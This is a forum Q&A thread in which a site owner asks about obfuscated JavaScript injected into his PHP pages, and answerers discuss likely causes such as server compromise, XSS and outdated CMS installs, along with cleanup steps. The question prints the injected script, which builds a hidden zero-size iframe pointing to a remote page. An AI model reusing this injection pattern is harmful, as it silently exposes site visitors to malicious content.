tags:

views:

409

answers:

7
+5  Q: 

JavaScript being injected in my PHP Pages

I have a website, and I just discoverd that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it?

<script> var x = unescape("%68% (**** some other hex characters here
****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e 
s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" he"+"i"+"ght=\"0\" 
fr"+"a"+"m"+"ebor"+"de"+"r=\"0\"><"+"/ifra"+"m"+"e>"); </script>

Which I'm not sure how got there. Anyone know how it got there? and what I can do to remove it?

+1  A: 

Are you using any 3rd party applications that have security holes? For example, a while back we had an issue with an old version of FCK editor, set up in the default location with all the samples folders in place that were being used to upload bad files.

ScottE  2009-10-30 16:23:23
+13  A: 

You need to know this now:

We see this at Linode quite a bit, and it's an indication that your server has been compromised by an attacker. When unescaped, it's likely to be a browser exploit that will infect your users, or a link to a spam site.

Save everything with the injected code for later analysis, and redeploy your entire server and Web stack immediately. The attacker undoubtedly has at least a shell on your box, and that will inevitably lead to root if he's crafty.

Redeploy now, keep your applications up to date, stop writing exploitable PHP, and lock down your user accounts with strong passwords or SSH keys. Not trying to pimp my company or anything, but this is such a common occurrence on poorly-managed Web boxen that we've written an article about how to completely redeploy from scratch. I suggest it several times a day.

EDIT: If you're downvoting me, please say why -- I've triaged three cases with this exact code, so I'm not making things up.

EDIT 2: There is one regard where I may be overestimating the situation, and it's only because I'm an employee of a VPS company (and I see this a lot). I made a mistake in assuming that this user's "Web host" was a server under his control, not shared hosting. That was a mistake, but there still is the chance that I'm right.

Compromise is a desperate situation where working in the dark can have disastrous consequences. If you do not know why an unauthorized party gained access to your infrastructure, you cannot rectify the problem. Since everyone assumed we're talking about managed, shared hosting here -- there is the chance that you're right and XSS is to blame. Again, the question was not presented with much data, and compromise is a situation that is not treated with enough gravity among developers in general.

I'm honestly tired of tickets that we open where a box is hitting another on the Internet with SSH probes, DoS data, URL injection, or anything for that matter -- and the Rails or PHP developer administering the box has no idea why it happened or what he can do about it. These are all things that indicate system compromise, not XSS. Therefore, my assumption that this was a server under the OP's control was misplaced, but it's forgivable (I hope) because I'm at work right now, handling those tickets.

If you'd like me to delete my answer, just say so, but I don't see any others getting votes.

Jed Smith  2009-10-30 16:24:03
It's programming related.
George Stocker  2009-10-30 16:28:34
I +1'd before I saw the code sample, the above script loads a file through an invisible iframe, that is very likely to be malicious if the author didn't put it there.
Mayo  2009-10-30 16:29:32
@George: No, it isn't, but I've removed the bit about ServerFault.
Jed Smith  2009-10-30 16:33:43
How do you figure that the machine is compromised? It's more likely that the code has been injected or submitted through a form.
roosteronacid  2009-10-30 16:41:19
Personal experience with extremely similar situations. One of the first things that appears after this code shows up in pages is the attacker SSH bruteforcing other machines on the Internet -- you can't submit that through a form.
Jed Smith  2009-10-30 16:46:57
Never trust anything entered by a user, ever.
Chris Ballance  2009-10-30 17:32:52
OK thank you all for you answers....I reckon it is something that has been submitted through a form I'm going to have to improve on a few things.
thegunner  2009-11-03 13:51:29
A: 

The obfuscated part unescapes to "t.cn/vid"

apphacker  2009-10-30 16:24:09
yeah it's a url...
thegunner  2009-10-30 16:27:15
+1  A: 

See this question which in its turn is a follow up of ServerFault question regarding a similar problem.

Miguel Ventura  2009-10-30 16:27:27
A: 

As I see your pages are been injected in code, so this was done because there is a security hole in your server or in any application running on it. The hacker has writing capabilities to your scripts and the solution can be so easy as changing your FTP password or so complex as searching for a hole in any application installed in your server.

But first try to change your FTP password, Change it by a very hard to guess one, at least 12 characters long with any special character on it. I have heard that there was a brute force attack being directed from russian hackers that was injecting scripts in the headers of the pages to redirect the users to any other sites for any obscure purpose.

backslash17  2009-10-30 16:41:41
A: 

It's less likely that this was done through your own code (since the code, nor the possible exploits for this are usually not widely known -- but that's obviously no reason not to secure it), but do a check for common but outdated apps (WordPress, Drupal, ...) on your account.

I've encountered something similar a few days ago, it turned out that there was an old WordPress (v2.0 I think) blog installed through which they could gain access.

If you can, also check your server logs for the time that your PHP files on the server were last modified. In my case, it gave a clear record of how they entered and what to do against it.

Wim  2009-10-30 16:44:49
You're kidding, right? The problem is they're very widely known. Exhibit A: http://ha.ckers.org/xss.html
George Stocker  2009-10-30 17:06:03
No, he isn't. Your answer is not the only one that is correct, and please stop acting like it is because you have rep. You don't *know* if it is XSS (in fact, nobody knows). You sound like you've never dealt with compromise, and think that a Web app is the only method an attacker can gain access.
Jed Smith  2009-10-30 17:11:46
+5  A: 

Since you mentioned PHP, I'll run through a list of possible ways it could have happened. This list is not all-inclusive; but it will allow you to do a fair amount of investigation into what happened.

  1. It's possible your web host was hacked and this was placed into your page through lax security on their part. However, do not assume this is the case. This should be your last resort.

  2. It's probably your fault. I don't say this to point blame; but the sooner we developers realize we're the cause of our problems, the better off we'll all be. The only developer I don't trust is the one that says he doesn't make mistakes.

  3. Your site was probably hit with an XSS attack.

    • Do you have any way for a user to type in information on your website? Do you use any textboxes or anything that would allow input from the user?

If so, then your site is vulnerable to XSS and other attacks. Here's a 'cheat-sheet' that will tell you general things you can do to mitigate this.

  1. You should not allow any user data to pass to the database without being parametrized.

  2. If you're going to allow a user to insert HTML, then you need to sanitize it.

  3. Don't use magic quotes.

There are many ways this could have happened, but without more information, I'm going off of what you've written.

Steps:

  1. Take the app offline.
  2. Query your database to see how many pages / entries this has been injected into.
  3. Check through your code for the things I mention.
  4. Fix those.
  5. Go through your database and take out any suspect lines (a SQL script would be easiest).
  6. Re-deploy App.
  7. Make sure you keep an eye on your webserver logs. They're a godsend to determining where the attack came from.
George Stocker  2009-10-30 16:49:59

related questions

IDE suggestions: Eclipse IDE vs. Zend Studio ( confused )
MySQL/Apache Error in PHP MySQL query
Lightweight IDE for Linux
What PHP framework would you choose for a new application and why?
Why is my ternary expression not working?
How can I get at the matches when using preg_replace in PHP?
Mechanisms for tracking DB schema changes
Wordpress theme development offline tools
Using object property as default for method property
How can I get the authenticated user name under Apache using plain HTTP authentication and PHP?
Make XAMPP/Apache serve file outside of htdocs
How do you debug PHP scripts?
PHP Variables passed by value or by reference?
Best way to implement unit testing in PHP
Connect PHP to an AS/400
Best way to access Exchange using PHP?
PHP Session Security
How do I access a remote form in php?
What's the best way to generate a tag cloud from an array? (using h1 through h6 for sizing)
Apache/PHP: error_log per Virtual Host?
How do I track file downloads with apache/PHP
How would you access Object properties from within an object method?
Flat File Databases in PHP
Best way to allow plugins for a PHP application
Latest information on PHP upcoming releases